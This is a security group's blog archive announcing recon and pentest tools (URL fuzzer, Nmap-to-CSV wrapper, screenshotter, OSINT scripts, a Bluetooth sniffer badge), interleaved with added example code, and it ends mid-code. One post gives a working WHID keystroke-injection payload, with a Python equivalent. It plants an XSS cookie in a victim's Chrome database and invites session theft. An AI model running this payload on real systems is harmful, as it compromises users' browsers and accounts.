Friday, January 17, 2020

LRL Github: Release Party!

We Been Codin' Like Rabbits.



Lost Rabbit Labs Releases New Tools...
https://github.com/LostRabbitLabs/

It's a new year and we've come out of the rabbit hole to release a few tools and scripts that have assisted us in recent adventures. These tools should all be considered beta and works in progress, but they are worth sharing to err on the side of helping others. In addition, we are making an effort to quickly upgrade our Python 2 scripts to Python 3, since Python 2 reached end of life on January 1, 2020. Below you will find more information about the new tools and how to use them. Please contribute, provide feedback, and reach out to us anytime at lostrabbitlabs@gmail.com





About LRL Tools:
The scripts in our repo are meant to supplement existing industry tools, and have a focus on 'Full Spectrum Teaming' (used by teams & rabbits of all colors). The tools were designed to produce rapid result sets with a high amount of actionable information, in easy-to-use formats. We share them in the hope of helping the community evolve its tradecraft by providing coding examples, showing usage, and discussing ways to improve both the tools and the techniques they use going forward. ;)




WisQuas - https://github.com/LostRabbitLabs/wisquas
A simple 'URL Revealer' (fast and lightweight scanner, enumerator, fingerprinter, fuzzer, assessor, and collector). Assists with finding vulnerabilities, anomalies, unique servers, available files/dirs, HTTP methods, and accessible web containers, in addition to auto-decoding headers and cookies.
  • Lang: Python2 - tldextract, urlparse, colorama, base64, binascii, codecs, ssl
  • Purpose: Penetration Testing / URL Scanner
  • Input: Provide one (1) URL with protocol
  • Output: Color coded console output

Example command:       ./wisquas.py -1 "http://www.lost-rabbit.com/"

More information:          New Tool Release: WisQuas



GimmeCookies - https://github.com/LostRabbitLabs/gimmecookies
Python3 script to generate CSV output files from domain-wide crawl for digital assets (like cookies!). Cookies can be further explored with another LRL tool - AnomalousCookie.
  • Lang: Python3 - sys, socket, subprocess, requests & Sublist3r
  • Purpose: Penetration Testing / Digital Asset Management
  • Input: Provide one (1) domain name
  • Output: CSV output of headers & cookies along with discovered subdomains

Example command:       ./gimmecookies.py lost-rabbit.com

More information:          Github README



nmap2csv - https://github.com/LostRabbitLabs/nmap2csv
A wrapper for Nmap that outputs port scan results to a CSV file (and an output 'targets.txt' file for use with 'grabbit').
  • Lang: Python3 - uses python-nmap
  • Purpose: Penetration Testing / Network Scanner
  • Input: Network or IP Address in CIDR format
  • Output: CSV output of Nmap scan results & 'grabbit target' file

Example command:       ./nmap2csv.py 192.168.0.0/24

More information:          NEW TOOL RELEASE: nmap2csv



grabbit - https://github.com/LostRabbitLabs/grabbit
Grabbit Like A Rabbit! Grabbit is a Python/Selenium based fuzzy screenshotter (png format). Provide a 'targets.txt' file with host:port (1 per line) and grabbit will provide service info and screenshots for all discovered hosts/ports.
  • Lang: Python2 - requests, socket, sys, pyvirtualdisplay, selenium, os
  • Purpose: Penetration Testing / Fuzzy Screenshotter
  • Input: Provide targets file with one (1) 'host:serviceport' per line
  • Output: 2 directories with PNG screenshots and TXT output of requests

Example command:       ./grabbit.py targets.txt

More information:          NEW TOOL RELEASE: grabbit



domaindoxer - https://github.com/LostRabbitLabs/domaindoxer
Quickly gather information around a provided 'domain name' in the areas of leaked code/docs/info, malware associations, pastebin dumps, public containers, and general OSINT.
  • Lang: Python3 - uses google search library
  • Purpose: OSINT - Find Data Leakage around a given domain name
  • Input: Provide one (1) domain name
  • Output: URL results from google on the CLI

Example command:     ./domaindoxer.py lost-rabbit.com

More information:       Github README



wabbit - https://github.com/LostRabbitLabs/wabbit
(W)hois (A)sn (B)locklist (B)ulk (I)nquiry (T)ool - Creates a CSV output file of domain and ASN WHOIS data plus blocklist status for multiple domains. Uses URLVoid, SiteAdvisor, FortiGuard, and optionally the Google Safe Browsing API v4 (requires your own API key).
  • Lang: Python3 - whois, IPWhois, bs4, pysafebrowsing
  • Purpose: OSINT - Bulk Whois/Blocklist Lookup
  • Input: List of targets in a file
  • Output: CSV output of results (1 domain per row)

Example command:     ./wabbit.py targets.txt

More information:       Github README




Thank you to everyone in the community and hacker family who has inspired, contributed, supported, and dedicated themselves to making our world (the physical and virtual) a better place. No matter what color your team is...remember that we are truly on the same team and in this together!


Happy New Year & Happy Hunting!
-- the Lost Rabbits --



Tuesday, January 7, 2020

NEW TOOL RELEASE: grabbit

Grabbit Like A Rabbit!


What is Grabbit? 
Grabbit is a Python/Selenium based fuzzy screenshotter (PNG format). Provide a 'targets.txt' file with one (1) host:port pair per line and grabbit will provide service info and screenshots for all discovered hosts/ports.


Where can you find grabbit?

https://github.com/LostRabbitLabs/grabbit

How does it work? 
  1. Performs socket connection to service port and logs output
  2. Performs HTTP request of service port (with screenshot/log)
  3. Performs HTTPS request of service port (with screenshot/log)
  4. Performs additional HTTP/HTTPS requests with a handful of fuzzed payloads: non-standard characters, a script tag, and an oversized 'flood' request


Example commands and usage...

./grabbit.py targets.txt
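As an added example (not grabbit's own code), the Python 3 snippet below shows the first step of that list, the raw socket 'grab', together with the targets.txt parsing that feeds it and the http/https URL pair that steps 2 and 3 request. The targets file contents are constructed, the small local banner server exists only so the example runs offline, and the function names are this example's, not grabbit's.

```python
"""Grabbit-style target handling: read host:port lines, banner-grab the raw
service, and build the http/https URLs to request next. Example code."""
import socket
import threading

# Constructed targets.txt contents (example data, not a real scan).
SAMPLE_TARGETS = """\
# blank lines and comments are skipped
192.168.0.10:22
192.168.0.10:443
www.lost-rabbit.com:443
"""


def parse_targets(text):
    """Return [(host, port), ...]; a malformed line raises instead of being guessed."""
    targets = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # rpartition keeps IPv6 literals such as [::1]:443 intact.
        host, sep, port = line.rpartition(":")
        if not sep or not host or not port.isdigit() or not 0 < int(port) < 65536:
            raise ValueError("bad target line: %r" % line)
        targets.append((host, int(port)))
    return targets


def candidate_urls(host, port):
    """Both schemes are tried because the port number alone does not prove
    which one the service speaks (HTTP on 8443 and TLS on 8080 both happen)."""
    return ["http://%s:%d/" % (host, port), "https://%s:%d/" % (host, port)]


def grab_banner(host, port, timeout=3.0, max_bytes=1024):
    """Connect and wait briefly for a server-speaks-first banner (SSH, SMTP,
    FTP, ...). Services that wait for the client (HTTP) return b''."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            return s.recv(max_bytes)
        except socket.timeout:
            return b""


def serve_banner_once(banner, host="127.0.0.1"):
    """Stand-in for a real service so the example runs offline: listen on an
    ephemeral port, send `banner` to the first client, then exit.
    Returns the port number."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def _run():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(banner)
        srv.close()

    threading.Thread(target=_run, daemon=True).start()
    return port


if __name__ == "__main__":
    port = serve_banner_once(b"SSH-2.0-OpenSSH_7.9p1\r\n")
    print(grab_banner("127.0.0.1", port))
    for host, p in parse_targets(SAMPLE_TARGETS):
        print(host, p, candidate_urls(host, p))
```

The banner grab deliberately returns an empty byte string on a quiet port rather than raising, so a run over a large targets.txt keeps going; a real run would feed the URL pairs to Selenium for the screenshots.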



Grabbit Walkthrough


1. Clone the 'grabbit' package from Github...


# git clone https://github.com/lostrabbitlabs/grabbit
# cd grabbit
# chmod 755 grabbit.py

2. Install the following libraries (geckodriver drives Firefox, so Firefox must be installed as well)...

pip install selenium requests pyvirtualdisplay
apt-get install xvfb
wget https://github.com/mozilla/geckodriver/releases/download/v0.18.0/geckodriver-v0.18.0-linux64.tar.gz
tar zxvf geckodriver-v0.18.0-linux64.tar.gz
chmod 755 geckodriver
cp geckodriver /usr/bin/geckodriver


3. Prepare 'targets.txt' file (see 'nmap2csv' for more info)...

NOTE: In the example below IP addresses are used, but host names may be used as well (e.g. www.lost-rabbit.com:443)


4. Run 'grabbit.py' command on 'targets.txt' file...

# ./grabbit.py targets.txt


5. Grabbit will perform requests on services and log output as well as perform screenshots of all successful requests...



6. When completed, there will be two (2) output directories with results (/services & /screenshots)...

Output of /screenshots directory ('ls' command):


Output of /screenshots directory (GUI):



Output of /services directory:




Monday, January 6, 2020

NEW TOOL RELEASE: nmap2csv

Port scanning to spreadsheets...


What is nmap2csv? 
A wrapper for Nmap (Python3) that outputs port scan results to a CSV file. Also created is a 'targets.txt' file where discovered services are logged one host:service pair per line.


Where can you find nmap2csv?

https://github.com/LostRabbitLabs/nmap2csv

How does it work? 
Modify the 'nmap2csv.py' file as needed to change 'nmap_args' (default below):

nmap_args = "-sV -T4 "

Provide a network or host (in CIDR notation) to 'nmap2csv.py' and it will perform the following...
  1. Perform Nmap scan
  2. Output CSV file of Nmap results
  3. Output 'targets.txt' file of all discovered services


Example commands and usage...

./nmap2csv.py 10.0.0.0/24
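As an added example (not the nmap2csv code itself), here is the CSV and targets.txt generation done from Nmap's XML output rather than through python-nmap, so it can be run offline against a saved scan such as 'nmap -sV -T4 -oX scan.xml 10.0.0.0/24'. The XML embedded below is constructed; the field names and the decision to keep only open ports in targets.txt (so grabbit is not pointed at filtered ports) are this example's choices.

```python
"""Parse an Nmap XML report (nmap -oX) into a semicolon-separated CSV and a
grabbit-style targets.txt (host:port, one per line). Example code."""
import csv
import io
import xml.etree.ElementTree as ET

# Constructed sample in nmap's -oX format (not a real scan).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -T4 -oX - 192.168.0.0/24">
  <host>
    <status state="up"/>
    <address addr="192.168.0.10" addrtype="ipv4"/>
    <hostnames><hostname name="web01.lan" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.9p1"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="open"/>
        <service name="https" product="nginx" version="1.14.2" tunnel="ssl"/>
      </port>
      <port protocol="tcp" portid="8080">
        <state state="filtered"/>
        <service name="http-proxy"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.168.0.11" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

FIELDS = ["host", "hostname", "port", "protocol", "state", "service", "product", "version"]


def parse_nmap_xml(xml_text):
    """Return one dict per scanned port for every host that is up."""
    rows = []
    root = ET.fromstring(xml_text)
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            addr = host.find("address")
        ip = addr.get("addr")
        hn = host.find("hostnames/hostname")
        hostname = hn.get("name", "") if hn is not None else ""
        for port in host.findall("ports/port"):
            state = port.find("state")
            svc = port.find("service")
            rows.append({
                "host": ip,
                "hostname": hostname,
                "port": int(port.get("portid")),
                "protocol": port.get("protocol"),
                "state": state.get("state") if state is not None else "",
                "service": svc.get("name", "") if svc is not None else "",
                "product": svc.get("product", "") if svc is not None else "",
                "version": svc.get("version", "") if svc is not None else "",
            })
    return rows


def to_csv(rows):
    """Semicolon-separated CSV (in LibreOffice pick 'Semicolon' as separator)."""
    buf = io.StringIO()
    w = csv.DictWriter(buf, fieldnames=FIELDS, delimiter=";", lineterminator="\n")
    w.writeheader()
    w.writerows(rows)
    return buf.getvalue()


def to_targets(rows):
    """host:port lines for open ports only, deduplicated, in scan order."""
    seen, out = set(), []
    for r in rows:
        if r["state"] != "open":
            continue
        t = "%s:%d" % (r["host"], r["port"])
        if t not in seen:
            seen.add(t)
            out.append(t)
    return out


if __name__ == "__main__":
    rows = parse_nmap_xml(SAMPLE_NMAP_XML)
    with open("NMAP-output-network.csv", "w") as f:
        f.write(to_csv(rows))
    with open("targets.txt", "w") as f:
        f.write("\n".join(to_targets(rows)) + "\n")
```

Hosts reported as down are skipped entirely, and a host with no reverse name still gets a row with an empty hostname column, so the CSV keeps one row per port rather than silently dropping anything.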


nmap2csv Walkthrough

1. Clone the 'nmap2csv' package from Github...


# git clone https://github.com/lostrabbitlabs/nmap2csv
# cd nmap2csv
# chmod 755 nmap2csv.py

2. Install the following library...


pip3 install python-nmap


3. Modify 'nmap_args' variable as needed...




4. Run 'nmap2csv.py' on desired host/network (be sure to use CIDR notation)...


# ./nmap2csv.py 1.3.3.0/24




5. When complete two (2) output files will be created...

  •  NMAP-output-network.csv (all Nmap results)
  •  targets.txt (hostname:port)



6. Using 'cat' to view the CSV file...



7. Opening with Libre Office will allow sorting and filtering...
Select 'Semicolon' as your 'Separator Character':


Sort by port, protocol, service name, version, and more:



8. Also created is 'targets.txt' with all discovered 'host:service' pairs (to be used with 'grabbit.py')...





Friday, December 27, 2019

NEW TOOL RELEASE: WisQuas

Revealing What May Be Hidden...



"Wis Quas strips illusion from creatures hidden by the cloak of invisibility, instantly revealing their position. Nightshade cut many times to form a paper-like sheet, then carved into lace is secured by spider silk. It is glazed, dried in the sun, then crystallized into a shiny powder that must be tossed in the sky over the field of battle as the spell is cast."

What is WisQuas? 
A simple 'URL Revealer' (fast and lightweight scanner, enumerator, fingerprinter, fuzzer, assessor, and collector). Assists with finding vulnerabilities, anomalies, unique servers, available files/dirs, methods, and containers, in addition to auto-decoding headers and cookies.


Where can you find WisQuas?

# git clone https://github.com/LostRabbitLabs/wisquas


How does it work? 
Provide a URL to WisQuas and it will perform the following functions...
  1. Resolve the hostname to an IP address
  2. Perform an ASN lookup on the IP address to provide ownership info and possible geolocation
  3. Inventory all received headers and cookies and attempt to auto-decode their values (hex/base64)
  4. Baseline the original URL request (with SSL certificate info if HTTPS) to compare against all other requests
  5. Perform tactical fuzzing and enumeration to generate unique errors and reveal layered web services
  6. Inspect the robots.txt file if available
  7. Enumerate the supported HTTP verbs
  8. Perform Host header manipulation to detect additional accessible containers (virtual hosts)


Example commands and usage...

WisQuas on URL using 'Desktop Browser' profile:
./wisquas.py -1 "http://www.lost-rabbit.com/"

WisQuas on URL using 'Mobile Browser' profile:
./wisquas.py -2 "http://www.lost-rabbit.com/"

WisQuas on URL using custom 'host header' on requests:
./wisquas.py -1 "http://www.lost-rabbit.com/" customhostname

Create a PDF report from output (requires additional software):
./wisquas.py -1 "http://lost-rabbit.com/" > lost-rabbit.com.txt ; cat lost-rabbit.com.txt | aha -b | wkhtmltopdf - lost-rabbit.com.pdf



WisQuas Walkthrough



1. Clone the 'WisQuas' package from Github...



2. You may need to do the following to install the 'tldextract' library...
# pip install tldextract --upgrade


3. Run 'WisQuas' on desired URL (be sure to include trailing slash)...
# ./wisquas.py -1 "http://www.angry_monkey.com/"


4. Analyze the results to reveal information about your URL...


WisQuas will connect to the target URL, and gather information about the original request. Collected headers and cookies will be analyzed and auto-decoded (if they are detected to be Hex or Base64).


In our example above, there is a cookie and a header that contain a Base64 encoded string, that were auto-decoded by WisQuas (highlighted with bright green text).
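Added example (not the WisQuas source): the auto-decode step for collected headers and cookies, in Python 3. The sample header values are constructed. The regexes, the printable-ratio threshold and the function names are this example's assumptions; the design point worth copying is the order of checks, since any all-hex string is also valid base64, and a value is only reported as decoded when the result reads as text, which keeps random session tokens from being 'decoded' into garbage.

```python
"""Auto-decode hex- or base64-looking header and cookie values, as WisQuas
does for everything it collects. Example code, not the WisQuas source."""
import base64
import binascii
import re
import string

# Assumptions of this example: minimum lengths keep short tokens like "ok"
# from being decoded, and a decoded result must be mostly printable text.
HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2}){4,}$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")
PRINTABLE = set(string.printable) - {"\x0b", "\x0c"}
PRINTABLE_RATIO = 0.9


def _mostly_printable(data):
    """Random bytes that happen to be valid hex/base64 would otherwise be
    reported as 'decoded'; require the result to read as text."""
    if not data:
        return False
    text = data.decode("utf-8", "replace")
    return sum(ch in PRINTABLE for ch in text) / len(text) >= PRINTABLE_RATIO


def auto_decode(value):
    """Return ("hex"|"base64", decoded_text) or None. Hex is tried first
    because every all-hex string is also syntactically valid base64."""
    v = value.strip()
    if HEX_RE.match(v):
        raw = binascii.unhexlify(v)
        if _mostly_printable(raw):
            return ("hex", raw.decode("utf-8", "replace"))
    if B64_RE.match(v) and len(v) % 4 == 0:
        try:
            raw = base64.b64decode(v, validate=True)
        except binascii.Error:
            return None
        if _mostly_printable(raw):
            return ("base64", raw.decode("utf-8", "replace"))
    return None


def decode_cookie(set_cookie):
    """Split a Set-Cookie header into (name, value, decoded-or-None)."""
    name, _, value = set_cookie.split(";", 1)[0].partition("=")
    return (name.strip(), value.strip(), auto_decode(value))


def decode_headers(headers):
    """headers: list of (name, value). Returns only the ones that decoded,
    as (name, encoding, decoded_text), mirroring the highlighted output."""
    found = []
    for name, value in headers:
        hit = auto_decode(value)
        if hit:
            found.append((name, hit[0], hit[1]))
    return found


# Constructed sample response headers (not from a real server).
SAMPLE_HEADERS = [
    ("Server", "Apache/2.4.41"),
    ("X-Debug", "73657373696f6e3d616263313233"),
    ("Set-Cookie", "sid=dXNlcj1hZG1pbjtyb2xlPWd1ZXN0; Path=/; HttpOnly"),
    ("X-Request-Id", "12345678"),
]
```

Note the last sample value: "12345678" is valid hex and valid base64, and both decodings produce mostly non-printable bytes, so it is correctly left alone. URL-encoded values (like the %3c sequences in the Cookie Baking post below) would need an unquote pass before this check.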



Original request information and totals, along with final landing page are displayed. Below that, you will find columnized, colorized output of tactical payload requests. Easily find patterns in similar types of requests, identify WAFs, discover hidden web servers and content, and confirm default installations and technologies used within a URL and its web services.

WEB RESPONSE COLOR CODES:
200 = GREEN (Successful request)
40x (other than 404/414) = YELLOW (Not authorized or otherwise rejected)
404 = WHITE (Not found)
414 = BLUE (URI too long; the expected answer to the 'flood' payload)
50x = RED (Server error)


The contents of the discovered 'robots.txt' file is displayed next for review. Available HTTP Verb requests are validated followed by 'Host Header Manipulation' attempts using a small list of custom hostnames.


Certain response code combinations, number of cookies and headers, and content-length can provide insight as to specific software or techniques in use, and may offer a clue on how to further communicate with the system.

More on that soon...until then...

If you have any questions or comments you can reach out to us at  lostrabbitlabs@gmail.com.




Tuesday, December 25, 2018

COOKIE BAKING: WHID-Injected Cookies

Baking up some holiday WHID-Injected Cookies...


Just in time for the holidays...LostRabbitLabs recently updated the cookie fuzzing tool "Anomalous Cookie" and rabbit-holed its way into a new attack vector called "Cookie Baking".

What is Cookie Baking?
Cookie Baking is the technique of creating or modifying a cookie in a user's local cookie jar (the browser's cookie store). This includes stuffing cookies with malicious payloads, affiliate tags, fuzz strings and more. Cookie Baking also provides a delivery method for 'Self-XSS' vulnerabilities, which are otherwise hard to exploit because the victim would have to inject the payload themselves.


Epic Holiday Cookie Baking...

If you would like to read more about 'Cookie Baking' and how it has been recently used, check out the blog "Epic Holiday Cookie Baking" at the Coalfire Labs website (link below):



Let's take the example XSS vulnerability discussed from "Epic Holiday Cookie Baking" and create a WHID Injector payload that can be used in our ingredients list.


MERRY CHRISTMAS from LostRabbitLabs...below you will find the full recipe for 'WHID-Injected Cookies'. >8-P



.-= WHID-Injected Cookies =-.

INGREDIENTS:
---------------------------------------------
  1.  1 x WHID-Injector (https://github.com/whid-injector/WHID)
  2.  1 x 'target' computer (in our 'case'...a Windows system)
  3.  1 x Vulnerable Cookie (using '_epicSID' from the example above)
  4.  1 x 'CookieBaker-WHID.txt' payload file (found below)

OPTIONAL:
      1 x WHID-Injector to Motherboard adapter (WI-to-MB) -  pictured below

NOTE: If you can 'Hide Yo' WHID' inside the 'target case', this will add persistence to your 'Cookie Baking'!

 
 


=============================================
=============================================

 'CookieBaker-WHID.txt'
  (save contents below to file - to be uploaded to your WHID Injector)

=============================================
=============================================

Delay
Delay
Delay
Press:131+114
PrintLine:powershell Start-Process cmd.exe -Verb runAs
Delay
Press:130+121
Delay
PrintLine:taskkill /im chrome.exe* /f
Delay
PrintLine:powershell
Delay
PrintLine:Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
Delay
PrintLine:Install-Module PSSQLite -Force
Delay
PrintLine:set-executionpolicy remotesigned
Delay
PrintLine:Import-Module PSSQLite
Delay
PrintLine:$Database = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
Delay
PrintLine:$query = "INSERT INTO cookies (creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,encrypted_value,firstpartyonly) VALUES  ('13186874114525467','.epicgames.com','_epicSID','kpjak%3c%2fscript%3e%3cScRiPt%3ealert(1)%3c%2fScRiPt%3efbu5ubf6b6ce405264df19ea1394b58aba4d0','/','0','0','1','13386874114525467','0','1','0',NULL,'0')"
Delay
PrintLine:Invoke-SqliteQuery -DataSource $Database -Query $query
Delay
PrintLine:exit
Delay
PrintLine:exit

=============================================
=============================================
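Added example (not the LRL payload or the Anomalous Cookie code): the same INSERT done from Python with the sqlite3 module, which makes two details of the recipe explicit. First, the creation_utc and last_access_utc numbers are WebKit timestamps, microseconds since 1601-01-01 UTC, so the helper below converts from Unix time. Second, the query is parameterised, so a payload containing quotes does not break the statement. The schema is a subset of the 2018-era Chrome 'cookies' table matching the column list in the payload (assumption: newer Chrome builds rename firstpartyonly to samesite and add columns, so check the target's schema first). Chrome must not be running while the file is written (hence the taskkill above), and Chrome only falls back to the plaintext value column when encrypted_value is empty. The demo database is a throwaway in a temp directory.

```python
"""Insert a cookie directly into Chrome's 'Cookies' SQLite database, the
operation the WHID payload above performs through PSSQLite. Example code."""
import os
import sqlite3
import tempfile
from datetime import datetime, timezone

# Chrome stores times as microseconds since 1601-01-01 00:00 UTC (the Windows
# FILETIME epoch). Seconds between that epoch and the Unix epoch:
EPOCH_DELTA_SECONDS = 11644473600


def unix_to_chrome(unix_seconds):
    """Unix time (seconds, int or float) -> Chrome/WebKit microseconds."""
    return int(unix_seconds * 1_000_000) + EPOCH_DELTA_SECONDS * 1_000_000


def chrome_time(dt):
    """Aware or naive-UTC datetime -> Chrome/WebKit microseconds."""
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    return unix_to_chrome(dt.timestamp())


def from_chrome_time(value):
    """Chrome/WebKit microseconds -> aware UTC datetime."""
    return datetime.fromtimestamp(value / 1_000_000 - EPOCH_DELTA_SECONDS, tz=timezone.utc)


# Subset of the 2018-era Chrome cookies table, matching the column list used
# in the payload above (assumption: later builds differ; verify on target).
SCHEMA = """
CREATE TABLE cookies (
  creation_utc INTEGER NOT NULL, host_key TEXT NOT NULL, name TEXT NOT NULL,
  value TEXT NOT NULL, path TEXT NOT NULL, expires_utc INTEGER NOT NULL,
  is_secure INTEGER NOT NULL, is_httponly INTEGER NOT NULL,
  last_access_utc INTEGER NOT NULL, has_expires INTEGER NOT NULL DEFAULT 1,
  is_persistent INTEGER NOT NULL DEFAULT 1, priority INTEGER NOT NULL DEFAULT 1,
  encrypted_value BLOB DEFAULT '', firstpartyonly INTEGER NOT NULL DEFAULT 0,
  UNIQUE (host_key, name, path)
)
"""


def bake_cookie(db_path, host_key, name, value, path="/", when=None):
    """Insert or replace a plaintext session cookie. The value goes in as a
    bound parameter, so quotes or semicolons in a payload cannot break the
    statement. encrypted_value is left empty so Chrome reads `value`."""
    ts = chrome_time(when or datetime.now(timezone.utc))
    con = sqlite3.connect(db_path)
    with con:
        con.execute(
            "INSERT OR REPLACE INTO cookies (creation_utc, host_key, name, value,"
            " path, expires_utc, is_secure, is_httponly, last_access_utc,"
            " has_expires, is_persistent, priority, encrypted_value, firstpartyonly)"
            " VALUES (?, ?, ?, ?, ?, 0, 0, 1, ?, 0, 1, 0, ?, 0)",
            (ts, host_key, name, value, path, ts, b""),
        )
    con.close()


def list_cookies(db_path, host_key):
    """Rows (name, value, creation_utc) for one host_key."""
    con = sqlite3.connect(db_path)
    rows = con.execute(
        "SELECT name, value, creation_utc FROM cookies WHERE host_key = ? ORDER BY name",
        (host_key,),
    ).fetchall()
    con.close()
    return rows


def demo():
    """Offline walk-through on a throwaway database: bake the PoC cookie, then
    bake it again with a quote-laden value (the second replaces the first)."""
    db_path = os.path.join(tempfile.mkdtemp(), "Cookies")
    con = sqlite3.connect(db_path)
    with con:
        con.executescript(SCHEMA)
    con.close()
    bake_cookie(db_path, ".epicgames.com", "_epicSID",
                "kpjak%3c%2fscript%3e%3cScRiPt%3ealert(1)%3c%2fScRiPt%3e",
                when=datetime(2018, 12, 25, tzinfo=timezone.utc))
    bake_cookie(db_path, ".epicgames.com", "_epicSID", "it's \"quoted\"; Path=/")
    return list_cookies(db_path, ".epicgames.com")
```

The same schema knowledge cuts the other way: a defender can diff the cookies table against a known-good copy, and a row whose creation_utc does not line up with any browsing session is exactly the anomaly a baked cookie leaves behind.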

DIRECTIONS:
---------------------------------------------
  1. Plug the 'WHID-Injector' into the 'target' system
  2. Connect to the WiFi network of the WHID-Injector's pre-configured access point
  3. Navigate to http://192.168.1.1 (or your custom pre-configured address)


  4. Choose 'Upload Payload' and select the newly created 'CookieBaker-WHID.txt' file
  5. From the main menu choose 'CookieBaker-WHID.txt' from the payload list


  6. Click on the 'Run Payload' button to run Cookie Baker on the target system


  7. Target exploited. Eat carrots. The cookie payload above shows a proof-of-concept XSS injection attack vector and payload, but you will need to create the full working payload yourself! Will you steal session cookies, BeEF-hook them, or create a more clever client-side attack not yet seen?




Next Steps...


  1. Update 'Anomalous Cookie' as needed with better payloads/techniques
  2. Create Metasploit module for 'Cookie Baking' framework
  3. Catalog all known vulnerable cookies and create shared database
  4. Investigate 'Affiliate Fraud' possibilities




                                           ...and a Happy New Year!



Saturday, October 13, 2018

DERBYCON VIII: Bluetooth DeMystifier

How to make a wearable Raspberry Pi...


LostRabbitLabs created five (5) 'Bluetooth DeMystifiers' and brought them to DerbyCon to share. This page will serve as the how-to and manual for those who have the badge and those who would like to build one. All parts needed to build one, along with instructions on how to use it, are listed below. If you would like a copy of the original SD card image (Raspberry Pi Zero W) let me know and I will provide the link. Code will be posted to our Github soon.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What is a Bluetooth DeMystifier?
Using a Raspberry Pi Zero W tucked in a bag (making it a 'Hacky Sack' - thank you pancho for the great name)...it is a Bluetooth enumerator, logger, identifier, sniffer, collector & plotter with SSH & web interfaces for admin access. With the DeMystifier you can identify Bluetooth/BLE devices around you, plot their signals over time to provide real-time proximity data, and collect stats on the top MAC addresses and vendors observed. This can assist with locating lost devices, detecting if you are being followed, and give some insight into the Bluetooth 'darknet' that exists all around us.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What you will need:
1. Raspberry Pi Zero W
2. Adafruit PiTFT 2.2" HAT Mini Kit - 320x240 2.2"
3. GPIO headers (for connecting PI to PiTFT)
4. Adafruit PowerBoost 1000C & one (1) on/off switch
5. 3.7v 2000mAh Lithium Ion Battery
6. One small leathery bag & Paracord



Back and front view of DeMystifier before it goes in the bag! Notice the four (4) buttons on the front below the screen!

Putting things together is pretty easy. Solder headers onto the Raspberry Pi. Solder the PiTFT to the headers (leaving room for access to the micro-USB ports on the Pi). Connect power wires from the PowerBoost to the Raspberry Pi and attach the battery. Slide it into the bag and loop paracord through the bag ties. Leather-punky...and done!



How to use:
1. Charge battery (or use microUSB power while charging)
2. Turn on/off switch to ON position (located on back of badge)
3. Device boots up! You should see output and boot-up images (shown below) on the screen followed by the DerbyCon VIII splash screen (pictured above). Be patient and badge may take 1-2 minutes to boot up completely.


4. Using the four (4) buttons on the front of the badge, you can access different bluetooth data being collected/observed.

BUTTON 1:
Displays a graph of the Top 10 most observed Bluetooth Mac Addresses over time. This shows patterns in observed bluetooth traffic, devices and the people/objects who control them. Use for Red-Teaming, Blue-Teaming, Purple-Teaming, Asset management, and curiosity!





BUTTON 2:
Pressing this button will show statistics around total Mac Addresses, vendors and connections observed along with a listing of all devices observed in the last 60 seconds.



The Bluetooth DeMystifier uses the open source tool 'bluetoothctl' (part of BlueZ) to provide some of the data seen in this view.






BUTTON 3:
This shows a real-time, enriched view (in the CSV format) of bluetooth/BLE signals observed complete with timestamp, vendor OUI lookup, and leaked strings.



BUTTON 4:
The Bluetooth DeMystifier uses the open source tool 'hcitool' (also part of BlueZ) to provide the data seen in this view. It provides real-time BLE scanning, listing the advertisements seen by 'hcitool lescan'. Occasionally the command 'hcitool lescan' displays an I/O error message. Just press the button again...and wish for the best!
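Added example (the DeMystifier's own source is not on this page): the enrichment step behind buttons 1 and 3, in Python 3. It parses 'hcitool lescan' lines into timestamped rows with a vendor OUI lookup, counts the top MAC addresses, and emits the CSV. The lescan lines and the OUI table are constructed; a real build should load the IEEE OUI list (Debian's ieee-data package ships oui.txt). It also includes a strict MAC validator, the check a practitioner would want on the web interface's macaddr parameter described further down, since a URL value handed to a shell command or grep unchecked is a classic injection point.

```python
"""Enrich `hcitool lescan` output the way the DeMystifier's CSV view does:
timestamp, vendor OUI lookup, advertised name, plus a top-N MAC count.
Example code; the DeMystifier's own source is not on this page."""
import collections
import csv
import io
import re
from datetime import datetime, timezone

# Constructed `hcitool lescan` output (not a real capture). hcitool prints a
# "LE Scan ..." banner, then "<MAC> <name or (unknown)>" per advertisement.
SAMPLE_LESCAN = """\
LE Scan ...
F4:5C:89:12:34:56 (unknown)
F4:5C:89:12:34:56 Jane's iPhone
D0:03:4B:AB:CD:EF Tile
F4:5C:89:12:34:56 (unknown)
00:1A:7D:DA:71:13 (unknown)
garbage line from a USB hiccup
"""

# Tiny OUI table, constructed for the example (vendor names are placeholders).
OUI = {
    "F4:5C:89": "Apple, Inc.",
    "D0:03:4B": "Tile, Inc.",
}

MAC_ONLY_RE = re.compile(r"^[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}$")
LESCAN_RE = re.compile(r"^([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\s+(.*)$")


def is_valid_mac(s):
    """Strict whitelist check. Run it on the web UI's ?macaddr= value before
    it is used in a shell command, a grep or a filename."""
    return MAC_ONLY_RE.match(s) is not None


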